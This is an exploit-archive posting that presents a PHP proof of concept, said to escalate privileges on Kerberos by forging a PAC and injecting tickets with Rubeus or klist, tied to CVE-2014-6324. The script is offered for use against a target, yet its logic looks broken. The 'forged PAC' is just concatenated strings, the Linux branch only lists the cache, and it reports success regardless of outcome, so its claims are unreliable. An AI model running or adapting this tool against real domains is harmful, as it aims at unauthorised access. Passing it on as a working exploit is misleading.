=============================================================================================================================================
| # Title     : Kerberos V5-1.21.3 Privilege Escalation & Ticket Injection Tool Vulnerability                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://web.mit.edu/kerberos/                                                                                               |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This code is written in PHP and aims to perform attacks on Kerberos via Ticket Injection and NTP Desync exploits. The code runs on Windows and Linux.

   (Related : https://packetstorm.news/files/id/180752/ Linked CVE numbers: CVE-2014-6324 ) .
	
[+] save code as poc.php.

[+] Set target : line 66

[+] PayLoad :

<?php
// Kerberos Exploit Tool
// Supports Windows & Linux
// Features: NTP desync, PAC manipulation, RC4-HMAC bypass, Ticket Injection
// Author: Indoushka

function check_os() {
    if (stripos(PHP_OS, 'WIN') !== false) {
        return "Windows";
    } elseif (stripos(PHP_OS, 'Linux') !== false) {
        return "Linux";
    } else {
        die("[!] Unsupported OS\n");
    }
}

// NTP Desync Exploit
function check_ntp_sync($target) {
    $output = shell_exec("ntpq -p " . escapeshellarg($target) . " 2>&1");
    if ($output === null) {
        echo "[!] Failed to execute NTP query.\n";
        return;
    }
    if (strpos(strtolower($output), "unsynchronized") !== false) {
        echo "[*] Target NTP is desynchronized - Possible Exploit!\n";
    } else {
        echo "[-] Target is synchronized - Harder to exploit.\n";
    }
}

// Kerberos Ticket Injection
function inject_ticket($ticket_data) {
    $os = check_os();
    if ($os == "Windows") {
        $ticket_path = "C:\\Windows\\Temp\\ticket.kirbi";
        file_put_contents($ticket_path, $ticket_data);
        $result = shell_exec("rubeus.exe ptt /ticket:" . escapeshellarg($ticket_path) . " 2>&1");
    } else {
        putenv("KRB5CCNAME=/tmp/krb5cc_0");
        $ticket_path = "/tmp/krb5cc_0";
        file_put_contents($ticket_path, $ticket_data);
        $result = shell_exec("klist -c " . escapeshellarg($ticket_path) . " 2>&1");
    }
    if ($result === null) {
        echo "[!] Ticket injection failed.\n";
    } else {
        echo "[+] Ticket successfully injected.\n";
    }
}

// Generate Fake PAC
function generate_pac($user_sid, $domain) {
    return pack("V", 0x00020000) . $domain . $user_sid;
}

// Main Exploit Function
function kerberos_exploit($target, $username, $password, $domain, $user_sid) {
    echo "[*] Targeting $target in domain $domain\n";
    check_ntp_sync($target);
    $pac = generate_pac($user_sid, $domain);
    inject_ticket($pac);
    echo "[+] Exploit completed. Check your privileges!\n";
}

// Example Usage
$target_ip = "192.168.1.100";
$user = "victim";
$pwd = "password123";
$domain_name = "DEMO.LOCAL";
$user_sid = "S-1-5-21-1234567890-1234567890-1234567890-1000";
kerberos_exploit($target_ip, $user, $pwd, $domain_name, $user_sid);
?>




Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================